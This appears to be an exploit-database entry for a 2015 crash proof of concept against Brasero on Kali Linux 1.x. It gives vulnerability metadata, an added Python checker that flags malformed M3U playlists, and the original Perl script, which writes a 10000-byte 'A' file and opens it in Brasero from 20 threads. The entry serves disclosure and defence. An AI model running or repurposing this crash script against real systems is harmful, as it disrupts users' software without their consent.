Vendor: Kali Linux
By: Mohammad Reza Espargham
CVSS: 7.5 (HIGH)
CWE: 119 (Buffer Overflow)
Product Name: Kali Linux
Affected Version From: Kali 1.x
Affected Version To: Kali 1.x
Patch Exists: YES
Related CWE: N/A
CPE: a:kali:kali_linux
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux
2015

Kali (brasero) – Crash Proof Of Concept

This proof of concept triggers a buffer overflow vulnerability in the Brasero application on Kali Linux. The vulnerability is triggered when a specially crafted M3U file is opened in the application, causing it to crash. The PoC code writes 10000 "A" characters to /tmp/r3z4.m3u and then opens that file in Brasero from 20 threads.

Mitigation:

Update to the latest version of the application.
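
A pre-open triage check for the input shape described above, added here as an example (it is not part of the original PoC or of Brasero): it flags playlists with no line breaks, over-long entries, or long repeated-byte runs. The thresholds MAX_LINE and MAX_RUN and all function names are assumptions.

```python
# Added example: pre-open triage for M3U playlists (not Brasero's own code).
MAX_LINE = 4096  # assumed ceiling for one playlist entry (path or URL)
MAX_RUN = 256    # assumed ceiling for one byte repeated back to back


def longest_run(line: bytes) -> int:
    """Length of the longest run of a single repeated byte in line."""
    best = run = 0
    prev = None
    for b in line:
        run = run + 1 if b == prev else 1
        prev = b
        best = max(best, run)
    return best


def triage_m3u(data: bytes) -> list:
    """Return findings for a playlist; an empty list means nothing flagged."""
    findings = []
    # A real playlist is line-oriented; one huge unbroken blob is not.
    if len(data) > MAX_LINE and b"\n" not in data and b"\r" not in data:
        findings.append("no line breaks in a file larger than one entry")
    for num, line in enumerate(data.splitlines(), start=1):
        if len(line) > MAX_LINE:
            findings.append(f"line {num}: {len(line)} bytes exceeds {MAX_LINE}")
        if longest_run(line) > MAX_RUN:
            findings.append(f"line {num}: repeated-byte run over {MAX_RUN}")
        if b"\x00" in line:
            findings.append(f"line {num}: NUL byte in entry")
    return findings


# Constructed samples: an ordinary extended-M3U playlist, and a file shaped
# like the one the PoC writes (10000 "A" bytes, no line breaks).
BENIGN = b"#EXTM3U\n#EXTINF:215,Artist - Title\n/home/user/Music/track01.mp3\n"
POC_SHAPED = b"A" * 10000

if __name__ == "__main__":
    for name, blob in (("benign", BENIGN), ("poc-shaped", POC_SHAPED)):
        print(name, triage_m3u(blob) or "clean")
```

A check like this can gate files before they reach a media application or serve as a hunting rule over user-writable directories; it does not replace updating the application.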

Exploit-DB raw data:

#!/usr/bin/perl -w
# Title : Kali (brasero) - Crash Proof Of Concept
# website : https://www.kali.org/downloads/
# Tested : kali 1.x
#
#
# Author      :   Mohammad Reza Espargham
# Linkedin    :   https://ir.linkedin.com/in/rezasp
# E-Mail      :   me[at]reza[dot]es , reza.espargham[at]gmail[dot]com
# Website     :   www.reza.es
# Twitter     :   https://twitter.com/rezesp
# FaceBook    :   https://www.facebook.com/mohammadreza.espargham
#
#

#Demo : http://youtu.be/XMu5ZXupbOI

system(($^O eq 'MSWin32') ? 'cls' : 'clear');


$path="/tmp/r3z4.m3u";
my $PoC = "\x41" x 10000 ;
open(crash , ">", $path);
print crash $PoC;
close(crash);


use threads;


sub check_app {   #thread sub
    system("brasero $path");
    return 0;
}

my @threads;
for (my $i = 0; $i < 20; $i++) {
    my $thread = threads->create(\&check_app);
    push(@threads, $thread);
}
foreach (@threads) { #join
    $_->join();
}